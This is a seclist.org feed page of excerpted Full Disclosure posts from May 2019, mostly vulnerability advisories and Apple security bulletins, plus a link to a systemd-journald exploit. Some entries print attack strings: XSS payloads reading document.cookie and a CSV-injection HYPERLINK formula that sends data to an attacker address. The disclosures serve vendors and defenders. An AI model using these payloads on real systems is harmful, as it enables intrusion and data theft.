seclist.org

Subscribe to seclist.org hírcsatorna
A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.
Frissítve: 2 óra 6 perc
2019. május 17.

local privilege escalation via CDE dtprintinfo

Posted by Marco Ivaldi on May 17

Dear Full Disclosure,

Please find attached an advisory for the following vulnerability:

A buffer overflow in the DtPrinterAction::PrintActionExists() function in the
Common Desktop Environment 2.3.0 and earlier, as used in Oracle Solaris 10 1/13
(Update 11) and earlier, allows local users to gain root privileges via a long
printer name passed to dtprintinfo by a malicious lpstat program.

Note that Oracle Solaris CDE is based on the original...
2019. május 17.

[CVE-2019-11880] CommSy <= 8.6.5 - SQL injection

Posted by Jens Regel | Schneider & Wulf on May 17

Title:
======
CommSy <= 8.6.5 - SQL injection

Researcher:
===========
Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG

CVE-ID:
=======
CVE-2019-11880

Timeline:
=========
2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Send details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
==================...
2019. május 17.

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

Posted by gionreale on May 17

GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability

It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system
information via a crafted request:

PoC:
---------------------------------------------------------------------------------------------------------------------------------------

POST /ws/gatshipWs.asmx/SqlVersion <...
2019. május 17.

[RT-SA-2019-002] Directory Traversal in Cisco Expressway Gateway

Posted by RedTeam Pentesting GmbH on May 17

Advisory: Directory Traversal in Cisco Expressway Gateway

RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.

Details
=======

Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Fixed Versions: See Cisco Bug ID CSCvo47769 [1]
Vulnerability Type: Directory Traversal
Security Risk: medium
Vendor URL:...
2019. május 15.

SEC Consult SA-20190515-0 :: Authorization Bypass in RSA NetWitness (@sec_consult)

Posted by SEC Consult Vulnerability Lab on May 15

SEC Consult Vulnerability Lab Security Advisory < 20190515-0 >
=======================================================================
title: Authorization Bypass
product: RSA NetWitness
vulnerable version: <10.6.6.1, <11.2.1.1
fixed version: 10.6.6.1, 11.2.1.1
CVE number: CVE-2019-3724
impact: Medium
homepage: https://www.rsa.com
found: 2018-09-18...
2019. május 14.

[CVE-2018-7841] Schneider Electric U.Motion Builder <= 1.3.4 track_import_export.php object_id Unauthenticated Command Injection

Posted by RCE Security on May 14

RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product: Schneider Electric U.Motion Builder
Vendor URL: www.schneider-electric.com
Type: OS Command Injection [CWE-78]
Date found: 2018-11-15
Date published: 2019-05-13
CVSSv3 Score: 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE: CVE-2018-7841

2. CREDITS
==========
This vulnerability was discovered...
2019. május 13.

Re: System Down: A systemd-journald exploit

Posted by Qualys Security Advisory on May 13

Hi all,

Our systemd-journald exploit for CVE-2018-16865 and CVE-2018-16866 is
now available at:

https://www.qualys.com/2019/05/09/system-down/system-down.tar.gz

It is also attached to this email. A few notes about this exploit:

- It supports several targets by default (vulnerable versions of Debian,
Ubuntu, Fedora, CentOS), and it should be relatively easy to add more
targets.

- When adding a new amd64 target, use the...
2019. május 13.

APPLE-SA-2019-5-13-5 Safari 12.1.1

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-5 Safari 12.1.1

Safari 12.1.1 is now available and addresses the following:

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
included in macOS Mojave 10.14.5
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team...
2019. május 13.

APPLE-SA-2019-5-13-6 Apple TV Software 7.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-6 Apple TV Software 7.3

Apple TV Software 7.3 is now available and addresses the following:

Bluetooth
Available for: Apple TV (3rd generation)
Impact: A remote attacker may cause an unexpected application
termination or arbitrary code execution
Description: An input validation issue existed in Bluetooth. This
issue was addressed with improved input validation.
CVE-2017-14315: Ben Seri and Gregory Vishnepolsky of Armis

Wi-Fi...
2019. május 13.

APPLE-SA-2019-5-13-4 watchOS 5.2.1

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-4 watchOS 5.2.1

watchOS 5.2.1 is now available and addresses the following:

AppleFileConduit
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple Watch Series 1 and later
Impact: Processing a...
2019. május 13.

APPLE-SA-2019-5-13-3 tvOS 12.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-3 tvOS 12.3

tvOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: Apple TV 4K and Apple TV HD
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

CoreAudio
Available for: Apple TV 4K and Apple TV HD
Impact: Processing a maliciously...
2019. május 13.

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update
2019-003 High Sierra, Security Update 2019-003 Sierra

macOS Mojave 10.14.5, Security Update 2019-003 High Sierra,
Security Update 2019-003 Sierra are now available and
addresses the following:

Accessibility Framework
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.4
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with...
2019. május 13.

APPLE-SA-2019-5-13-1 iOS 12.3

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-1 iOS 12.3

iOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

Contacts
Available for: iPhone 5s and later, iPad...
2019. május 13.

[CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity Services

Posted by Joshua Mulliken on May 13

===================
Title: [CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity
Services
Author: Joshua Mulliken <
joshua () mulliken net

Thanks to: Carnegie Mellon University CERT Coordination Center
Date Found: Dec. 17, 2018
Vendor: Ellucian Company L.P.
Vendor Homepage:
https://www.ellucian.com
Products: Banner Web Tailor and Banner Enterprise Identity Services
Web Tailor Affected...
2019. május 13.

TOR browser / Firefox telemetry data

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that shows up in tcpdump
when you do not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times )

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...
2019. május 13.

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...
2019. május 10.

Cross Site Scripting | WolfCMS v0.8.3.1 and before

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.
2019. május 10.

CSV Injection | Alkacon OpenCMS v10.5.4 and before

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe&quot;)'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...
2019. május 10.

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details is available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...
2019. május 10.

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...